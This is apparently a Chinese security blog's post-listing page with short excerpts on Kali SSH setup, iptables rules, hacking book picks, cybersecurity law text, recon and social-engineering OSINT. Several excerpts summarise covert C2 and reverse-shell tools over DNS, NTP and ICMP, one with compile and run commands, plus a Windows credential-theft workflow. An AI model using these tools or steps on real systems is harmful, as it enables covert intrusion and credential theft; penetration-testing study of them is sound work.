摘要: Kali Linux 各版本开启ssh 服务 2019版kali Linux SSH链接办法 修改kali关于SSH服务默认配置并重启SSH服务,步骤如下: 打开sshd_config文件 leafpad /etc/ssh/sshd_config 或者 vi /etc/ssh/sshd_config 阅读全文
posted @ 2024-10-09 19:02 ZapcoMan 阅读(141) 评论(0) 推荐(0) 编辑
摘要: Kali && Debain 防火墙规则 查看防火墙规则 iptables -L -n -v iptables -L -n -v 增加防火墙规则:开放指定的端口 iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT #允许本地回环接口(即运行本机 阅读全文
posted @ 2024-10-09 19:02 ZapcoMan 阅读(15) 评论(0) 推荐(0) 编辑
摘要: 自学成为黑客的五本好书 黑客入门 这是一个非常适合初学者的书籍,就算你毫无根基你也能用它来打开黑客世界的大门 Kali Linux 高级渗透测试 不会用kali 和 Linux的黑客 都是假黑客 学完它就可以秒杀所有的脚本小子 计算机网络:自顶向下的方法 你想在网络里当个隐形人 怎么能不了解计算机网 阅读全文
posted @ 2024-10-09 19:01 ZapcoMan 阅读(26) 评论(0) 推荐(0) 编辑
摘要: 第一章 总 则 第一条 为了保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展,制定本法。 第二条 在中华人民共和国境内建设、运营、维护和使用网络,以及网络安全的监督管理,适用本法。 第三条 国家坚持网络安全与信息化发展并重,遵循积 阅读全文
posted @ 2024-10-09 18:53 ZapcoMan 阅读(85) 评论(0) 推荐(0) 编辑
摘要: DNShell 一款基于DNS C2隧道的反弹shell工具。 支持 功能: 支持DNS-recordA-直连型 的C2隧道。 目标: Windows下基于Powershell的反弹。 Linux下基于ShellScript的反弹。 使用方法 阅读全文
posted @ 2024-10-09 18:45 ZapcoMan 阅读(14) 评论(0) 推荐(0) 编辑
摘要: NTPShell 获取地址:https://github.com/aplyc1a/NTPShell 通过NTP协议来负载C2数据。 编译 gcc ntp.c -lpthread -o ntp 使用 c2服务端:./ntp -S c2被控端:./ntp -C -s {server_addr} 阅读全文
posted @ 2024-10-09 18:45 ZapcoMan 阅读(8) 评论(0) 推荐(0) 编辑
摘要: p1ngp0ng 轻量级ICMP C2工具 依赖 Linux环境与GCC套件。 功能: p1ng: p1ng,实现C2服务器正向连接被控端。目前实现了对客户端的命令控制与文件上传下载。明文传输,未加密。 p0ng: p0ng,实现被控端反向连接C2服务器。目前实现了对客户端的命令控制与文件上传下载。 阅读全文
posted @ 2024-10-09 18:45 ZapcoMan 阅读(6) 评论(0) 推荐(0) 编辑
摘要: Windows 0x00 文件目录操作 1.查找文件 cmd: for /r 目录名 %变量名 in (匹配模式1,匹配模式2) do 命令 for /r d: %i in (*) do @echo %i for /r d: %i in (*.txt,*.jpg) do @echo %i for / 阅读全文
posted @ 2024-10-09 18:43 ZapcoMan 阅读(7) 评论(0) 推荐(0) 编辑
摘要: Windows 1 系统凭据 https://cloud.tencent.com/developer/article/1656546 下面这些工具对凭据的分析普遍需要管理员权限。一般来说,对于windows的凭据窃取类攻击流程是这么玩的: 拿到一台windows,尽可能的提到高权限,检查是否有域,有 阅读全文
posted @ 2024-10-09 18:43 ZapcoMan 阅读(15) 评论(0) 推荐(0) 编辑
摘要: 基本信息收集 系统类型判断 使用whoami能快速判断系统是Linux还是Windows。 如果是Windows, 使用命令systeminfo | findstr OS可得到WIndows版本。 使用命令echo %PROCESSOR_ARCHITECTURE%可看出系统是基于什么架构的。 如果是 阅读全文
posted @ 2024-10-09 18:42 ZapcoMan 阅读(17) 评论(0) 推荐(0) 编辑
摘要: 0x01 渗透测试中的目标资产信息收集 1 目标单位清单信息收集 1.1 通用搜索引擎查询 搜索企业关键字。如果搜索引擎支持语法查询,可以使用语法快速过滤结果(参考google hacking)。 得到的结果往往不全,需要结合其他方式进行扩展与补充。 1.2 网络安全搜索引擎 使用网络安全搜索引擎的 阅读全文
posted @ 2024-10-09 18:39 ZapcoMan 阅读(25) 评论(0) 推荐(0) 编辑
摘要: 人,是网络安全全流程中最大的弱点。针对人的攻击往往有出奇不意的效果。而想要利用人的弱点进行攻击,那么对目标的信息收集与了解就是非常重要的了。这篇文章记录了一些常用的用于对人进行身份信息收集的技术。这些技术常被用于溯源取证、社工攻击。 0x00 社工分析中的身份信息收集 关于人的社工分析有很多维度的信 阅读全文
posted @ 2024-10-09 18:29 ZapcoMan 阅读(188) 评论(0) 推荐(0) 编辑